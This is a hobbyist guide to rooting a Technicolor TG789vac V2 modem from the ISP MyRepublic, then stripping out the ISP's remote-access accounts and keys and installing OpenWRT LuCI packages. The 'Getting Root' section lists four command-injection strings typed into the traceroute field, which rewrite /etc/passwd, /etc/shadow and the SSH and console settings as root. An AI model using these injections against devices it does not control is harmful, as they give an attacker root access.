Technicolor TG789vac V2 Root Access

I recently had a MyRepublic NBN connection installed, and was provided with a Technicolor TG789vac V2 VDSL2 modem. It arrived quite locked down, in routed mode it could not deal with the complexity of my network (multiple VLANs), and in bridge mode it bridged the VDSL2 interface to the Wifi connection, but not Ethernet!

Following this page gave me enough background to get root on the device. The netcat trick described didn't work for me, but wiring up a serial port allowed me to get information out of the machine.

 

Getting Root

Following the example here, navigate to the Traceroute diagnostic page, and enter each the commands below into the IP address field, executing a traceroute after each command. This exploits a bug in the parser that validates user input from the web form, allowing commands to be run as root on the machine.
:::::::; sed -i '1 s/false/ash/' /etc/passwd ; cat /etc/passwd > /dev/ttyS0
:::::::; sed -i '1 c\root:[your root password hash here]:17078:0:99999:7:::' /etc/shadow ; cat /etc/shadow > /dev/ttyS0
:::::::; sed -i '8 s/0/1/' /etc/config/dropbear; cat /etc/config/dropbear > /dev/ttyS0
:::::::; sed -i '3 s/#//' /etc/inittab; cat /etc/inittab > /dev/ttyS0

Cleaning up the machine

There are a number of things you must to do sanitise the machine:

  • Follow the instructions here to disable cwmpd.
  • Remove the MyRtech user (remote root access to the machine).
  • Edit /etc/config/system & change coredump/reboot to 0 (if you don't, and a package you add crashes, you may get caught in a boot-loop and will require the serial port to recover).
  • Edit /etc/dropbear/authorized_keys and remove the TCH_Development key (another remote root access path)
  • Edit etc/nginx/nginx.conf and alter the listen lines to only listen on your local LAN

Installing other packages

The platform is marked 'brcm63xx-tch' rather than 'bcrm63xx'. To install other packages, edit /etc/opkg.conf and add the following:
arch all 1
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10

Installing LUCI

To get the OpenWRT LUCI UI on your system, you will need to build it.

  • Follow the OpenWRT build instructions to grab the Chaos Calmer distribution. You will need to clone the repository from https://github.com/openwrt/chaos_calmer.git.
  • Follow the instructions to add all feeds, then enable the LUCI packages you want. Don't build anything yet
  • The Technicolor build has a more recent ubus than the OpenWRT distribution. If you don't update it, rpcd will crash, which will result in a Bad Time for you (refer to coredump/reboot above). Edit package/sys/ubus/Makefile and change PKG_VERSION to 2016-07-02, PKG_SOURCE_VERSION to 053be7df871e05478284235732f8b0608089512f, and add '+libblobmsg-json' to the DEPENDS line for Package/ubusd
  • Build OpenWRT as per the instructions
  • Copy the packages you want to the machine: scp bin/brcm63xx/packages/luci/*.ipk bin/brcm63xx/packages/base/libuci-lua_*.ipk bin/brcm63xx/packages/base/rpcd_*.ipk bin/brcm63xx/packages/base/uhttpd*.ipk bin/brcm63xx/packages/base/libiwinfo*.ipk root@[machine IP]:/tmp/
  • Install the packages: opkg --force-overwrite install /tmp/*.ipk
  • Edit /etc/config/uhttpd and change the listen port from 80 to 81, as nginx (which hosts the Technicolor UI) is already on port 80.